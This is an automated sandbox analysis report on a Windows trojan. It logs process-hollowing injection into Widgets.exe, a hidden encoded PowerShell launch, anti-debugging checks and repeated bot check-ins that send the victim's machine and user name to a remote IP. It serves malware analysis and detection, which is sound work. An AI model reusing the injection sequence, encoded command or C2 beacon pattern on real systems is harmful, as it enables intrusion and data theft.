NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c05000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 296 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c06000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	powershell -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 15, 2023, 8:44 a.m.	show_type: 0 filepath_r: powershell parameters: -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== filepath: powershell	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x00176600', u'virtual_address': u'0x00002000', u'entropy': 7.654567154267597, u'name': u'.text', u'virtual_size': u'0x00176554'}

entropy

7.65456715427

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00048000', u'virtual_address': u'0x0017a000', u'entropy': 7.365368300342033, u'name': u'.rsrc', u'virtual_size': u'0x00048000'}

entropy

7.36536830034

description

A section with a high entropy has been found

entropy

0.999720044793

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 15, 2023, 8:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW May 15, 2023, 8:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (12 events)

description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

79.137.195.205

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 2680 region_size: 225280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002f8	1	0	0

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory May 15, 2023, 8:44 a.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $VíÉxxxÁ xÁ xÁ x]x]x][xÁ xxcxÓxÓ\|xÓxRichxPEL#Ddà""Û@@p@@d@àPàõ8 õ@@\|.text) `.rdataäÝ@Þ.@@.data @À.rsrcà@@@.relocP@B base_address: 0x00400000 process_identifier: 2680 process_handle: 0x000002f8	1	1
WriteProcessMemory May 15, 2023, 8:44 a.m.	buffer: ÿÿÿÿ ÿÿÿÿNæ@»±¿Duÿÿÿÿ aB fBÄ C,5C,5C,5C,5C,5C,5C,5C,5C,5CÈ C05C05C05C05C05C05C05Cp C..fBÿÿÿÿaB¨!C¨!C¨!C¨!C¨!Cp CcBeBHlBè Cð#CCþÿÿÿ PSTPDTPSTPDT`"C "Cà"C`#C abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þþÿÿÿUB.?AVruntime_error@std@@UB.?AVlogic_error@std@@UB.?AVlength_error@std@@UB.?AVregex_error@std@@UB.?AVbad_exception@std@@UB.?AVbad_alloc@std@@UB.?AVexception@std@@UB.?AVbad_array_new_length@std@@UB.?AVbad_cast@std@@UB.?AV_Locimp@locale@std@@UB.?AVtype_info@@UB.?AV_Node_if@std@@UB.?AV?$collate@D@std@@UB.?AV?$_Node_str@D@std@@UB.?AV?$ctype@D@std@@UB.?AV_Node_end_rep@std@@UB.?AV_Node_end_group@std@@UB.?AV_Node_back@std@@UB.?AV_Facet_base@std@@UB.?AU_Crt_new_delete@std@@UB.?AV_Node_base@std@@UB.?AUctype_base@std@@UB.?AV_Root_node@std@@UB.?AVfacet@locale@std@@UB.?AV_Node_assert@std@@UB.?AV_Node_rep@std@@UB.?AV?$_Node_class@DV?$regex_traits@D@std@@@std@@UB.?AV_Node_capture@std@@UB.?AV_Node_endif@std@@ base_address: 0x00432000 process_identifier: 2680 process_handle: 0x000002f8	1	1
WriteProcessMemory May 15, 2023, 8:44 a.m.	buffer: 0 H`@}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00434000 process_identifier: 2680 process_handle: 0x000002f8	1	1
WriteProcessMemory May 15, 2023, 8:44 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2680 process_handle: 0x000002f8	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory May 15, 2023, 8:44 a.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $VíÉxxxÁ xÁ xÁ x]x]x][xÁ xxcxÓxÓ\|xÓxRichxPEL#Ddà""Û@@p@@d@àPàõ8 õ@@\|.text) `.rdataäÝ@Þ.@@.data @À.rsrcà@@@.relocP@B base_address: 0x00400000 process_identifier: 2680 process_handle: 0x000002f8	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 296 called NtSetContextThread to modify thread in remote process 2680
NtSetContextThread May 15, 2023, 8:44 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4250402 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000408 process_identifier: 2680	1	0	0

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (16 events)

Time & API	Arguments	Status	Return
HttpOpenRequestA May 15, 2023, 8:44 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:44 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:44 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:44 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:44 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:44 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:44 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:44 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:45 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:45 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:45 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:45 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:45 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:45 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:45 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356
HttpOpenRequestA May 15, 2023, 8:45 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34	1	13369356

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 296 resumed a thread in remote process 2680
NtResumeThread May 15, 2023, 8:44 a.m.	thread_handle: 0x00000408 suspend_count: 1 process_identifier: 2680	1	0	0

File has been identified by 22 AntiVirus engines on VirusTotal as malicious (22 events)

MicroWorld-eScan	Gen:Variant.Razy.692724
McAfee	Artemis!F0016739C32F
Malwarebytes	Malware.AI.1668695844
Cybereason	malicious.9c32ff
Arcabit	Trojan.Razy.DA91F4
Elastic	malicious (high confidence)
Kaspersky	UDS:Trojan-Downloader.MSIL.Seraph.gen
BitDefender	Gen:Variant.Razy.692724
Emsisoft	Gen:Variant.Razy.692724 (B)
VIPRE	Gen:Variant.Razy.692724
McAfee-GW-Edition	Artemis!Trojan
FireEye	Generic.mg.f0016739c32ff1b3
Microsoft	Trojan:Win32/Casdet!rfn
ZoneAlarm	UDS:Trojan-Downloader.MSIL.Seraph.gen
GData	Gen:Variant.Razy.692724
VBA32	CIL.HeapOverride.Heur
ALYac	Gen:Variant.Razy.692724
MAX	malware (ai score=81)
Rising	Trojan.Crypt!8.2E3 (CLOUD)
MaxSecure	Trojan.Malware.300983.susgen
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_100% (W)

Executed a process and injected code into it, probably while unpacking (29 events)

Time & API	Arguments	Status	Return
NtResumeThread May 15, 2023, 8:44 a.m.	thread_handle: 0x00000188 suspend_count: 1 process_identifier: 296	1	0
NtResumeThread May 15, 2023, 8:44 a.m.	thread_handle: 0x000001fc suspend_count: 1 process_identifier: 296	1	0
NtResumeThread May 15, 2023, 8:44 a.m.	thread_handle: 0x00000244 suspend_count: 1 process_identifier: 296	1	0
NtResumeThread May 15, 2023, 8:44 a.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 296	1	0
NtGetContextThread May 15, 2023, 8:44 a.m.	thread_handle: 0x0000018c	1	0
NtGetContextThread May 15, 2023, 8:44 a.m.	thread_handle: 0x0000018c	1	0
NtResumeThread May 15, 2023, 8:44 a.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 296	1	0
NtGetContextThread May 15, 2023, 8:44 a.m.	thread_handle: 0x0000018c	1	0
NtGetContextThread May 15, 2023, 8:44 a.m.	thread_handle: 0x0000018c	1	0
NtGetContextThread May 15, 2023, 8:44 a.m.	thread_handle: 0x0000018c	1	0
NtSetContextThread May 15, 2023, 8:44 a.m.	registers.eip: 1928735620 registers.esp: 5631080 registers.edi: 59231079 registers.eax: -45 registers.ebp: 5631096 registers.edx: 52 registers.ebx: 65244000 registers.esi: 63511642 registers.ecx: 255 thread_handle: 0x0000018c process_identifier: 296	1	0
NtResumeThread May 15, 2023, 8:44 a.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 296	1	0
CreateProcessInternalW May 15, 2023, 8:44 a.m.	thread_identifier: 2168 thread_handle: 0x00000404 process_identifier: 2164 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000040c	1	1
CreateProcessInternalW May 15, 2023, 8:44 a.m.	thread_identifier: 2684 thread_handle: 0x00000408 process_identifier: 2680 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\Widgets.exe filepath_r: stack_pivoted: 0 creation_flags: 134742020 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002f8	1	1
NtGetContextThread May 15, 2023, 8:44 a.m.	thread_handle: 0x00000408	1	0
NtAllocateVirtualMemory May 15, 2023, 8:44 a.m.	process_identifier: 2680 region_size: 225280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002f8	1	0
WriteProcessMemory May 15, 2023, 8:44 a.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $VíÉxxxÁ xÁ xÁ x]x]x][xÁ xxcxÓxÓ\|xÓxRichxPEL#Ddà""Û@@p@@d@àPàõ8 õ@@\|.text) `.rdataäÝ@Þ.@@.data @À.rsrcà@@@.relocP@B base_address: 0x00400000 process_identifier: 2680 process_handle: 0x000002f8	1	1
WriteProcessMemory May 15, 2023, 8:44 a.m.	buffer: base_address: 0x00401000 process_identifier: 2680 process_handle: 0x000002f8	1	1
WriteProcessMemory May 15, 2023, 8:44 a.m.	buffer: base_address: 0x00424000 process_identifier: 2680 process_handle: 0x000002f8	1	1
WriteProcessMemory May 15, 2023, 8:44 a.m.	buffer: ÿÿÿÿ ÿÿÿÿNæ@»±¿Duÿÿÿÿ aB fBÄ C,5C,5C,5C,5C,5C,5C,5C,5C,5CÈ C05C05C05C05C05C05C05Cp C..fBÿÿÿÿaB¨!C¨!C¨!C¨!C¨!Cp CcBeBHlBè Cð#CCþÿÿÿ PSTPDTPSTPDT`"C "Cà"C`#C abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þþÿÿÿUB.?AVruntime_error@std@@UB.?AVlogic_error@std@@UB.?AVlength_error@std@@UB.?AVregex_error@std@@UB.?AVbad_exception@std@@UB.?AVbad_alloc@std@@UB.?AVexception@std@@UB.?AVbad_array_new_length@std@@UB.?AVbad_cast@std@@UB.?AV_Locimp@locale@std@@UB.?AVtype_info@@UB.?AV_Node_if@std@@UB.?AV?$collate@D@std@@UB.?AV?$_Node_str@D@std@@UB.?AV?$ctype@D@std@@UB.?AV_Node_end_rep@std@@UB.?AV_Node_end_group@std@@UB.?AV_Node_back@std@@UB.?AV_Facet_base@std@@UB.?AU_Crt_new_delete@std@@UB.?AV_Node_base@std@@UB.?AUctype_base@std@@UB.?AV_Root_node@std@@UB.?AVfacet@locale@std@@UB.?AV_Node_assert@std@@UB.?AV_Node_rep@std@@UB.?AV?$_Node_class@DV?$regex_traits@D@std@@@std@@UB.?AV_Node_capture@std@@UB.?AV_Node_endif@std@@ base_address: 0x00432000 process_identifier: 2680 process_handle: 0x000002f8	1	1
WriteProcessMemory May 15, 2023, 8:44 a.m.	buffer: 0 H`@}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00434000 process_identifier: 2680 process_handle: 0x000002f8	1	1
WriteProcessMemory May 15, 2023, 8:44 a.m.	buffer: base_address: 0x00435000 process_identifier: 2680 process_handle: 0x000002f8	1	1
WriteProcessMemory May 15, 2023, 8:44 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2680 process_handle: 0x000002f8	1	1
NtSetContextThread May 15, 2023, 8:44 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4250402 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000408 process_identifier: 2680	1	0
NtResumeThread May 15, 2023, 8:44 a.m.	thread_handle: 0x00000408 suspend_count: 1 process_identifier: 2680	1	0
NtResumeThread May 15, 2023, 8:44 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2164	1	0
NtResumeThread May 15, 2023, 8:44 a.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 2164	1	0
NtResumeThread May 15, 2023, 8:44 a.m.	thread_handle: 0x00000488 suspend_count: 1 process_identifier: 2164	1	0
NtResumeThread May 15, 2023, 8:44 a.m.	thread_handle: 0x000004d4 suspend_count: 1 process_identifier: 2164	1	0

Widgets.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All